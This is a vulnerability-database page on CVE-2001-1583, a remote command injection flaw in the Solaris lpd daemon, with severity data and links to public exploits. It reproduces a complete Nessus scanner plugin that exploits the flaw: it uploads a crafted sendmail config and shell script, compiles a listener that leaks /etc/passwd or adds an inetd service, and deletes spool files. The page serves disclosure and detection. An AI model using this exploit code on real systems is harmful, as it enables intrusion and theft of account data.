Vulnerabilities > CVE-2001-1583 - OS Command Injection vulnerability in SUN Sunos

CVSS 10.0 - CRITICAL

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

COMPLETE

Integrity impact

COMPLETE

Availability impact

COMPLETE

network

low complexity

sun

CWE-78

critical

nessus

exploit available

metasploit

NVD

Published: 2001-12-31

Updated: 2022-09-13

Summary

lpd daemon (in.lpd) in Solaris 8 and earlier allows remote attackers to execute arbitrary commands via a job request with a crafted control file that is not properly handled when lpd invokes a mail program. NOTE: this might be the same vulnerability as CVE-2000-1220.

Vulnerable Configurations

Part	Description	Count
OS	Sun SUN Sunos - SUN Sunos 3.5 SUN Sunos 4.0 SUN Sunos 4.0.1 SUN Sunos 4.0.2 SUN Sunos 4.0.3 SUN Sunos 4.0.3C SUN Sunos 4.1 SUN Sunos 4.1.1 SUN Sunos 4.1.2 SUN Sunos 4.1.3 SUN Sunos 4.1.3C SUN Sunos 4.1.3U1 SUN Sunos 4.1.4 SUN Sunos 4.1Psr_A SUN Sunos 5.0 SUN Sunos 5.1 SUN Sunos 5.2 SUN Sunos 5.3 SUN Sunos 5.4 SUN Sunos 5.5 SUN Sunos 5.5.1 SUN Sunos 5.6 SUN Sunos 5.7 SUN Sunos 5.8 SUN Sunos 5.9	26

Common Weakness Enumeration (CWE)

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Common Attack Pattern Enumeration and Classification (CAPEC)

Command Line Execution through SQL Injection
An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
Command Delimiters
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
Exploiting Multiple Input Interpretation Layers
An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
Argument Injection
An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
OS Command Injection
In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.

Exploit-Db

description	Solaris. CVE-2001-1583. Remote exploit for solaris platform
id	EDB-ID:9921
last seen	2016-02-01
modified	2001-08-31
published	2001-08-31
reporter	H D Moore
source	https://www.exploit-db.com/download/9921/
title	Solaris <= 8.0 - LPD Command Execution

description	Solaris LPD Command Execution. CVE-2001-1583. Remote exploit for solaris platform
id	EDB-ID:16322
last seen	2016-02-01
modified	2010-09-20
published	2010-09-20
reporter	metasploit
source	https://www.exploit-db.com/download/16322/
title	Solaris LPD Command Execution

description	Solaris 2.x/7.0/8 lpd Remote Command Execution Vulnerability. CVE-2001-1583. Remote exploit for solaris platform
id	EDB-ID:21097
last seen	2016-02-02
modified	2001-08-31
published	2001-08-31
reporter	ron1n
source	https://www.exploit-db.com/download/21097/
title	Solaris 2.x/7.0/8 lpd Remote Command Execution Vulnerability

description	Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit). CVE-2001-1583. Remote exploit for solaris platform
id	EDB-ID:1167
last seen	2016-01-31
modified	2005-08-19
published	2005-08-19
reporter	Optyx
source	https://www.exploit-db.com/download/1167/
title	Solaris <= 10 LPD Arbitrary File Delete Exploit metasploit

Metasploit

description	This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.
id	MSF:EXPLOIT/SOLARIS/LPD/SENDMAIL_EXEC
last seen	2020-04-11
modified	2017-07-24
published	2005-12-31
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1583
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/lpd/sendmail_exec.rb
title	Solaris LPD Command Execution

Nessus

NASL family	Gain a shell remotely
NASL id	SOLARIS_LPD_ENV_CMD_EXEC.NASL
description	The remote lpd daemon is vulnerable to an environment error that could allow an attacker to execute arbitrary commands on this host. Nessus uses this vulnerability to retrieve the password file of the remote host although any command could be executed.
last seen	2020-06-01
modified	2020-06-02
plugin id	11513
published	2003-04-03
reporter	This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/11513
title	Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # This script attempts to compile a program which will send # us /etc/passwd. If no compiler is installed on the remote system, # then it adds a service (id) in inetd.conf, on port 1. # # Ref: remorse [http://web.archive.org/web/20040506190754/http://www.geocities.com/entrelaspiernas/], by ron1n <[email protected]> include( 'compat.inc' ); if(description) { script_id(11513); script_version ("1.27"); script_cve_id("CVE-2001-1583"); script_bugtraq_id(3274); script_name(english:"Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution"); script_summary(english:"Reads the remote password file, thanks to lpd"); script_set_attribute( attribute:'synopsis', value:'The remote lpd daemon is vulnerable to arbitrary command execution.' ); script_set_attribute( attribute:'description', value:'The remote lpd daemon is vulnerable to an environment error that could allow an attacker to execute arbitrary commands on this host. Nessus uses this vulnerability to retrieve the password file of the remote host although any command could be executed.' ); script_set_attribute( attribute:'solution', value:'None at this time. Disable this service.' ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Solaris LPD Command Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute( attribute:'see_also', value:'http://seclists.org/bugtraq/2001/Aug/437' ); script_set_attribute(attribute:"plugin_publication_date", value: "2003/04/03"); script_set_attribute(attribute:"vuln_publication_date", value: "2001/08/31"); script_cvs_date("Date: 2019/10/25 13:36:22"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DESTRUCTIVE_ATTACK); # Intrusive? script_copyright(english:"This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Gain a shell remotely"); script_require_ports("Services/lpd", 515); script_dependencies("find_service1.nasl"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("data_protection.inc"); CTRL = 2; DATA = 3; MAGIC_PORT = get_host_open_port(); if(MAGIC_PORT <= 1 \|\| MAGIC_PORT == 139 \|\| MAGIC_PORT == 445 )MAGIC_PORT = 39876; else MAGIC_PORT --; function intro(soc) { local_var ack; send(socket:soc, data:raw_string(0x2)); send(socket:soc, data:crap(data:"/", length:1010)); send(socket:soc, data:string("NESSUS\n")); ack = recv(socket:soc, length:1); if(ack == NULL)exit(0); } function xfer(soc, type, buf, dst) { local_var r, req; req = raw_string(type) + string(strlen(buf), " ", dst, "\n"); send(socket:soc, data:req); r = recv(socket:soc, length:1); if(r == NULL)exit(0); send(socket:soc, data:buf); send(socket:soc, data:raw_string(0)); r = recv(socket:soc, length:1); if(r == NULL)exit(0); } mailcf = "V8 Ou0 Og0 OL0 Oeq OQ/tmp FX\|/bin/sh /var/spool/lp/tmp/<REPLACEME>/script S3 S0 R$+ $#local $@blah $:blah S1 S2 S4 S5 Mlocal P=/bin/sh, F=S, S=0, R=0, A=sh /var/spool/lp/tmp/<REPLACEME>/script Mprog P=/bin/sh, F=S, S=0, R=0, A=sh /var/spool/lp/tmp/<REPLACEME>/script"; script = ' #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/ucb:/usr/local/bin:/usr/local/sbin:/usr/xpg4/bin:/opt/sfw/bin:/usr/ccs/bin export PATH cd /tmp where=`which gcc 2>&1 \| grep -v "no $1"` test -n "$where" && CC=gcc test -z "$CC" && { where=`which cc 2>&1 \| grep -v "no $1"` test -n "$where" && CC=cc if [ -z "$CC" ]; then echo "tcpmux stream tcp nowait root /usr/bin/id id" > ic ; /usr/bin/inetd -s ic; rm ic; exit ; fi } cat > c.c << __EOF__ #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <fcntl.h> int main(int argc, char *argv) { int sd, cd; int fd; char buf[4096]; int so = 1; struct sockaddr_in saddr; memset(&saddr, 0, sizeof saddr); saddr.sin_family = AF_INET; saddr.sin_port = htons(MAGIC_PORT); saddr.sin_addr.s_addr = htonl(INADDR_ANY); sd = socket(AF_INET, SOCK_STREAM, 0); setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &so, sizeof(so)); bind(sd, (struct sockaddr ) &saddr, sizeof saddr); listen(sd, 1); cd = accept(sd, NULL, NULL); fd = open("/etc/passwd", O_RDONLY); if(fd < 0)write(cd, "exploit worked", strlen("exploit worked")); else {read(fd, buf, sizeof(buf) - 1);close(fd);} buf[sizeof(buf) - 1] = 0; write(cd, buf, strlen(buf)); shutdown(cd, 2); close(cd); exit(0); } __EOF__ $CC -o c c.c -lsocket ./c & rm -f c.c c rm -rf /var/spool/lp/tmp/* rm -rf /var/spool/lp/requests/'; control = 'Hnessus P\\"-C/var/spool/lp/tmp/<REPLACEME>/mail.cf\\" nobody fdfA123config fdfA123script'; script = ereg_replace(string:script, pattern:"MAGIC_PORT", replace:string(MAGIC_PORT)); mailcf = ereg_replace(string:mailcf, pattern:"<REPLACEME>", replace:this_host_name()); control = ereg_replace(string:control, pattern:"<REPLACEME>", replace:this_host_name()); port = get_service(svc:"lpd", default: 515, exit_on_fail: 1); soc = open_priv_sock_tcp(dport:port); if(!soc)exit(1, "Could not connect to TCP port "+port+"."); soc1 = open_priv_sock_tcp(dport:port); if(!soc1)exit(1, "Could not connect to TCP port "+port+"."); intro(soc:soc); xfer(soc:soc, type:CTRL, buf:control, dst:"cfA123nessus"); xfer(soc:soc, type:DATA, buf:mailcf, dst:"mail.cf"); xfer(soc:soc, type:DATA, buf:script, dst:"script"); send(socket:soc, data:raw_string(2) + '!\n'); close(soc); intro(soc:soc1); xfer(soc:soc1, type:CTRL, buf:control, dst:"cfA123nessus"); xfer(soc:soc1, type:DATA, buf:mailcf, dst:"dfA123config"); xfer(soc:soc1, type:DATA, buf:script, dst:"dfA123script"); close(soc1); sleep(10); soc = open_sock_tcp(MAGIC_PORT); if(!soc){ soc = open_sock_tcp(1); if(soc){ r = recv_line(socket:soc, length:4096); if(egrep(pattern:"uid=[0-9].gid=[0-9]", string:r))security_hole(port); } exit(0); } r = recv(socket:soc, length:4096); if(r) { if("exploit worked" >< r )security_hole(port); # Worked but could not open /etc/passwd... else if(egrep(pattern:".root:.:0:", string:r)) { r = data_protection::redact_etc_passwd(output:r); report = "The remote lpd daemon is vulnerable to an environment error which may allow an attacker to execute arbitrary commands on this host. We used this vulnerability to retrieve an extract of /etc/passwd : " + r; security_hole(port:port, extra:report); } }

Packetstorm

data source	https://packetstormsecurity.com/files/download/82322/sendmail_exec.rb.txt
id	PACKETSTORM:82322
last seen	2016-12-05
published	2009-10-28
reporter	H D Moore
source	https://packetstormsecurity.com/files/82322/Solaris-LPD-Command-Execution.html
title	Solaris LPD Command Execution

Summary

Vulnerable Configurations

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

Exploit-Db

Metasploit

Nessus

Packetstorm

References